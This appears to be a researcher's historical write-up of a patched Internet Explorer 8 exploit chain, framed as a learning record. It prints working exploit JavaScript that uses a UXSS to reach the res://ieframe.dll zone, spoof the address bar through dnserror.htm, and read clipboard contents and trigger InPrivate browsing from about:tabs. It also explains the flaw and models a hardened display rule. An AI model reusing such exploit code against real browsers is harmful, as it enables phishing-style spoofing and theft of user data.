This builds on the offsetParent UXSS (entry #16) to reach the res://ieframe.dll zone. Once inside that zone, two things become possible: spoofing the address bar using dnserror.htm#arbitrary-url, and accessing IE8’s About:Tabs page — which in that build exposed clipboard contents, browsing history, and an InPrivate browsing trigger.

<iframe onload="iframe_onload()" src="res://ieframe.dll/feedbase.htm"
        width="20" height="20" scrolling="no"></iframe>

<script language="JavaScript">
function iframe_onload()
{
    // Use the offsetParent UXSS to get into the ieframe.dll document
    window[0][0].location = "offsetparent.html";
}

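// document_of_ieframe_feedbase is not defined in this snippet; it is assumed to be
// the feedbase.htm document handle obtained by the offsetParent UXSS step.
function exploit_AddressBarSpoof()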
{
    document_of_ieframe_feedbase.parentWindow.win_dns_error =
        window.open('res://ieframe.dll/dnserror.htm#http://www.google.com','ieframe_dll_window');

    document_of_ieframe_feedbase.parentWindow.win_dns_error.location =
        'res://ieframe.dll/dnserror.htm#http://www.google.com';

    document_of_ieframe_feedbase.parentWindow.setTimeout(
        'win_dns_error.document.body.innerHTML = "<h1>Hacked!</h1>"', 100);
}

function exploit_IE8_About_Tabs()
{
    if (window.postMessage)
    {
        document_of_ieframe_feedbase.parentWindow.win_about_tabs =
            window.open('about:tabs','ieframe_dll_window');

        document_of_ieframe_feedbase.parentWindow.setTimeout(
            'win_about_tabs.execScript("alert(\'Clipboard: \' + document.all.clipboardText.innerText)");' +
            'win_about_tabs.execScript("document.all.startInPrivateBrowsingLinkClick.click()");',
        100);
    }
}
</script>

The address bar spoof works because res://ieframe.dll/dnserror.htm#http://target.com displays the fragment as the visible URL while the real location stays hidden. The About:Tabs exploitation raises a broader question: why expose clipboard data in that page at all? There is no legitimate user benefit, and every time an attacker finds a path into res:// they gain clipboard read access for free.
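The display rule behind the spoof can be modelled in a few lines. This is an added example, not code from the original post or from IE: the `nav` object with its `browserInitiated` and `failedUrl` fields is a hypothetical model, and the hardened rule is one possible design, not Microsoft's actual fix.

```javascript
// Toy model of address-bar display logic (added illustration, not IE code).
const ERROR_PAGE = "res://ieframe.dll/dnserror.htm";

// Split "base#fragment" by hand; the res: scheme is not a standard URL scheme.
function splitFragment(location) {
  const i = location.indexOf("#");
  return i === -1
    ? { base: location, fragment: "" }
    : { base: location.slice(0, i), fragment: location.slice(i + 1) };
}

// Behaviour the text describes: on the DNS error page the fragment is shown
// as the URL, no matter who navigated there.
function displayUrlAsDescribed(nav) {
  const { base, fragment } = splitFragment(nav.location);
  if (base.toLowerCase() === ERROR_PAGE && fragment) return fragment;
  return nav.location;
}

// Hardened rule (assumption): show the fragment only when the browser itself
// committed the error page, and only if it equals the URL that really failed.
function displayUrlHardened(nav) {
  const { base, fragment } = splitFragment(nav.location);
  const isErrorPage = base.toLowerCase() === ERROR_PAGE;
  if (isErrorPage && nav.browserInitiated && fragment === nav.failedUrl) {
    return fragment;
  }
  return nav.location; // otherwise show the real location
}

// Constructed sample navigations (hypothetical fields).
const SCRIPT_OPENED = {
  location: ERROR_PAGE + "#http://www.google.com",
  browserInitiated: false, // reached through window.open from page script
  failedUrl: null,
};
const GENUINE_FAILURE = {
  location: ERROR_PAGE + "#http://www.google.com",
  browserInitiated: true, // browser committed it after a failed lookup
  failedUrl: "http://www.google.com",
};
```

Under the hardened rule, a script-opened error page shows its real `res://` location, so content injected into it can no longer borrow the fragment's identity.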

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.